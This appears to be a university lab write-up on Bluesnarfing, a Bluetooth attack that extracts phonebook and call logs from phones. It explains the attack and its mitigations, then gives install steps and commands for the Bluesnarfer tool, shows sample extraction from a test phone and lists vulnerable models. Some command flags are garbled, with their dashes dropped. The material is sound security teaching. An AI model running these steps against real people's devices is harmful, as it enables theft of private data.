Bluesnarfing

Nicholas Rinyu
Edited and revised by Feng Zhu

ABSTRACT
Bluesnarfing is an attack that a Bluetooth device maliciously hack into other Bluetooth
enabled devices by using the target devices Bluetooth MAC address. Any device that
has discoverable mode on may be a victim. If the discoverable mode is off, but a hacker
knows or can find the Bluetooth MAC address of a target device, the device may still be
in danger. Once connected, the attacker can anonymously obtain confidential data
(phonebook, received calls, calls made, and calendar information). To fully prevent this
attack, one needs to disable Bluetooth all together. It is recommended that Bluetooth
only be enabled when in use and immediately turned off again when not needed.

INTRODUCTION
Bluesnarfing is a hacking attack that uses a Bluetooth connection to take control of a
mobile device. Once control has been obtained, the hacker has access to many
functions and confidential data stored in the host device. Some such functions, for
example, are the ability to make phone calls and send text messages using the hacked
smartphone. The variety of data that the hacker can steal includes phonebook
information, calendar entries, memos, pictures, and even videos. When a hacker is
finished with the device, they have the ability to malicious delete all data mentioned
above. Bluesnarfing is one of the most dangerous types of Bluetooth attacks because it
allows a hacker to steal and destroy confidential data from mobile devices.

BACKGROUND INFORMATION
The Bluetooth MAC address is a uniquely identifying address of all Bluetooth devices.
When a Bluetooth device is in the discoverable mode, the Bluetooth MAC can easily be
found by any other Bluetooth device. To establish a connection between two devices,
one of them needs to be in the discoverable mode. After pairing of the two devices is

completed, each device only needs to have Bluetooth enabled for them to communicate
with one another.

THE ATTACK
Bluesnarfing takes advantage of Bluetooth enabled devices such as smartphones that
are in discoverable mode. If a device is not in discoverable mode, an attacker may still
be able to attack the device by finding the Bluetooth MAC address. Once a devices
Bluetooth MAC address is found, the Bluesnarfing attack attempts to make the
connection to the device by pairing. Fortunately, pairing seems more difficult for
attackers today under the new Bluetooth specification. After successfully pairing with
the device, the users private information is at the mercy of the hacker. As long as the
device remains in range, the attacker can obtain all entries in the phonebook, the
received call list, or calls made list. The attacker can also delete all entries and call a
phone number.

MITIGATION
We suggest the following methods to mitigate a Bluesnarfing attack.
1. Turn off the discoverable mode. This will make it more difficult for an attacker to
gain the Bluetooth MAC address and access to a targeted device. When
Bluetooth pairing is needed, turn on discoverable mode to pair with devices and
then immediately turn it off.
2. The best way to prevent Bluesnarfing is by having Bluetooth disabled all
together. When connected to an external device is no longer needed, disable
Bluetooth.
3. Know what devices you have paired your Bluetooth device to. When Bluetooth is
enabled in public, it would be wise to occasionally check the list of Bluetooth
enabled devices connected to your device. If something unfamiliar is paired,
remove it immediately, and disable Bluetooth.

PROJECT DESCRIPTION
Connect to a Bluetooth enabled device. Access information such as phonebook, recent
calls received, and recent calls made on a smartphone.

Use a Linux operating system, which allows a user to find the Bluetooth MAC
address of Bluetooth enabled devices in the discoverable mode.
Other software may be used to force a pairing between the devices. Pairing may
be needed to set up manually.
Use the Bluesnarfer software that allows obtaining the data on a Bluetooth.
Mitigate the Bluesnarfing attack.

HARDWARE & SOFTWARE REQUIREMENTS

Computer or laptop with Bluetooth hardware or a dongle

Linux operating system (Ubuntu recommended)
Bluetooth and Bluez libraries
Bluesnarfing software

INSTALLATION INSTRUCTIONS
The software works on a Linux Operating System( Ubuntu).
Step 1: Create a new folder in the /opt directory: $ sudo mkdir /opt/bluesnarfer
Step 2: Download the following two files and place them in that directory:
1) bluez-libs-3.36.tar.gz (http://www.bluez.org/download)
2) Bluesnarfer.tar.gz (http://www.alighieri.org/project.html)
3) Copy files to created directory: $ sudo cp blue* /opt/bluesnarfer/
Step 3: Unpack both files:
1) Library: $ sudo tar xvzf bluez-libs-3.36.tar.gz
2) Software: $ sudo tar xvzf bluesnarfer.tar.gz
Step 4: Change login to root: $ su root
Step 5: Install library:
1) $ cd bluez-libs-3.36
2) $ ./configure ; make ; make install
3) this takes about a 30-60 seconds
Step 6: Install Bluesnarfer:
1) $ cd ..
2) $ cd bluesnarfer
3) $ sudo mkdir myhack
4) $ cd src
5) $ sudo cp blue* /opt/bluesnarfer/bluesnarfer/myhack
6) $ cd ..

7) $ cd include
8) $ sudo cp blue* /opt/bluesnarfer/bluesnarfer/myhack
9) $ cd ..
10) $ cd myhack
11) $ gcc bluesnarfer.c o bluesnarfer lm lbluetooth
Step 7: Setup rfcomm:
1) $ mkdir p /dev/bluetooth/rfcomm
2) $ cd /dev/bluetooth/rfcomm
3) $ mknod m 666 /dev/bluetooth/rfcomm/0 c 216 0
Step 8: Software is now installed.
1) $ cd /opt/bluesnarfer/bluesnarfer/myhack
2) $ ./bluesnarfer

SAMPLE PROJECT RESULTS

Before using the Bluesnarfing software, the Bluetooth MAC address of an external
device is needed. This can be accomplished by running the Linux scanning tool (Figure
1). It will find all Bluetooth devices in the discoverable mode.

Figure 1. The outputted MAC address belongs to a Verizon, LG VX9100 cell phone.
The next step is forcing a pairing of the devices or the devices need to be paired
manually.
After pairing is complete, figure out what channel will work. Run as the super user
mode for the next step. At the Linux prompt, type the following:
# sdptool browse tree l2cap 00:21:FB:22:B7:46 > outputfile.
Open the outputfile and locate all lines that start with Channel/Port. The code at the
end of each line will be 0xNUMBER. The NUMBER value is what is needed. Record
each of these values as they will be needed for the next step.
Move to the directory where the Bluesnarfer application was compiled ($ cd
/opt/bluesnarfer/bluesnarfer/myhack).
Run the following command (Figure 2) for each Channel/Port value (represented as
NUMBER) found in the outputfile, until one reports back the device name.

$ ./bluesnarfer l b 00:21:FB:22:B7:46 C NUMBER

Figure 2. In the case of this phone, channel 4 worked and the device information is displayed.
At this time, the MAC address and channel of the phone is available. Connect to the
phonebook directory (Figure 3). This must be done before the phonebook entries can
be accessed.

Figure 3. The phonebook list is now accessible.

Now, one can view the phonebook entries, outgoing calls made, and incoming calls
received as shown in Figures 4, 5, and 6.

Figure 4. A list of all contacts (phonebook) stored in the cell phone.

Figure 5. A list of the received calls (RC) still stored on the cell phone.

Figure 6. A list of the dialed calls (DC) still stored on the cell phone.

DISCUSSIONS
One thing to keep in mind for this project is that the Bluesnarfer software dates back to
2004 or before. There are a limited number of guides on how to use the software and
even less on how to install it.
During the installation, one could fail on installing the Bluez library. The user has to be
logged in as root to successfully install the software.
When compiling the Bluesnarfer software, one may keep getting errors. The install
instructions stated only to type make in the main Bluesnarfer directory. That may not
work. For some Bluetooth drivers, one need add lm lbluetooth to the end of the
compile line.
The HOW-TO document never mentioned anything about finding the channel. One has
to obtain channel information from a Bluetooth device using sdptool (# sdptool browse
tree l2cap [MAC] > outputfile).
The Bluesnarfer software does not perform brute force pairing. For old cell phone, it
might be easier to perform brute force pairing. One may need to manually pair the
devices for experiment.

KNOWN VULNERABLE DEVICES

The following is a list of devices that Bluesnarfer software is known to work on:

Sony Ericsson T68, T68i, R520m, T610, Z1010

Nokia 6310, 6310i, 8910, 8910i

FURTHER READING AND REFERENCES

1. Newth, Alex, What is Bluesnarfing?, wiseGEEK, 25 Mar 2013, available at
http://www.wisegeek.com/what-is-bluesnarfing.htm.
2. trifinite.stuff, Long Distance Snarf, Aug. 2004, available at:
http://trifinite.org/trifinite_stuff_lds.html.
3. SecuriTeam, Bluesnarfer A Bluesnarfing Utility, Beyond Security, 7 Mar 2005, Web. 8 Apr
2013, available at: http://www.securiteam.com/tools/5KP0220F5E.html.